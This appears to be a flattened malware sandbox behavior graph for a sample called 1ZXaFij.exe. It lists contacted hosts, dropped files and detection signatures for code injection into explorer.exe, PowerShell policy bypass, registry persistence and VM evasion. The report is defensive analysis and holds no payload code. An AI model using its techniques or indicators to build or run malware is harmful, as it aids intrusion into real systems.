        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1627183 Sample: 1ZXaFij.exe Startdate: 01/03/2025 Architecture: WINDOWS Score: 100 86 ip-api.com 2->86 88 discord.com 2->88 90 6 other IPs or domains 2->90 104 Suricata IDS alerts for network traffic 2->104 106 Malicious sample detected (through community Yara rule) 2->106 108 Multi AV Scanner detection for dropped file 2->108 110 7 other signatures 2->110 11 1ZXaFij.exe 3 2->11         started        16 runps.exe 2->16         started        18 explorer.exe 2->18         started        20 4 other processes 2->20 signatures3 process4 dnsIp5 96 45.144.212.77, 16000, 49700 HPC-MVM-ASHU Ukraine 11->96 98 discord.com 162.159.138.232 CLOUDFLARENETUS United States 11->98 80 C:\Users\user\AppData\Roaming\...\runps.exe, PE32+ 11->80 dropped 82 C:\Users\user\AppData\Roaming\installer.ps1, Unicode 11->82 dropped 84 C:\Users\user\...\runps.exe:Zone.Identifier, ASCII 11->84 dropped 130 Uses cmd line tools excessively to alter registry or file data 11->130 132 Found API chain indicative of sandbox detection 11->132 134 Drops PE files to the startup folder 11->134 22 cmd.exe 1 11->22         started        25 reg.exe 1 1 11->25         started        136 Sample or dropped binary is a compiled AutoHotkey binary 16->136 27 cmd.exe 16->27         started        29 reg.exe 1 16->29         started        138 System process connects to network (likely due to code injection or exploit) 18->138 140 Query firmware table information (likely to detect VMs) 18->140 100 a-0003.a-msedge.net 204.79.197.203, 443 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->100 102 127.0.0.1 unknown unknown 20->102 31 WerFault.exe 20->31         started        33 WerFault.exe 20->33         started        35 WerFault.exe 20->35         started        file6 signatures7 process8 signatures9 116 Suspicious powershell command line found 22->116 118 Bypasses PowerShell execution policy 22->118 37 powershell.exe 22 22->37         started        41 conhost.exe 22->41         started        120 Creates autostart registry keys with suspicious values (likely registry only malware) 25->120 43 conhost.exe 25->43         started        45 powershell.exe 27->45         started        47 conhost.exe 27->47         started        49 conhost.exe 29->49         started        process10 file11 72 C:\Users\user\AppData\...\5trl00oq.cmdline, Unicode 37->72 dropped 122 Injects code into the Windows Explorer (explorer.exe) 37->122 124 Writes to foreign memory regions 37->124 126 Compiles code for process injection (via .Net compiler) 37->126 51 explorer.exe 10 3 37->51 injected 55 csc.exe 3 37->55         started        74 C:\Users\user\AppData\Local\...\vk4yczyv.0.cs, Unicode 45->74 dropped 128 Creates a thread in another existing process (thread injection) 45->128 58 csc.exe 3 45->58         started        signatures12 process13 dnsIp14 92 ip-api.com 208.95.112.1 TUT-ASUS United States 51->92 94 checkip.eu-west-1.prod.check-ip.aws.a2z.com 108.128.124.3 AMAZON-02US United States 51->94 112 System process connects to network (likely due to code injection or exploit) 51->112 114 Suspicious powershell command line found 51->114 60 powershell.exe 19 51->60         started        62 powershell.exe 51->62         started        76 C:\Users\user\AppData\Local\...\5trl00oq.dll, PE32 55->76 dropped 64 cvtres.exe 1 55->64         started        78 C:\Users\user\AppData\Local\...\vk4yczyv.dll, PE32 58->78 dropped 66 cvtres.exe 1 58->66         started        file15 signatures16 process17 process18 68 conhost.exe 60->68         started        70 conhost.exe 62->70         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.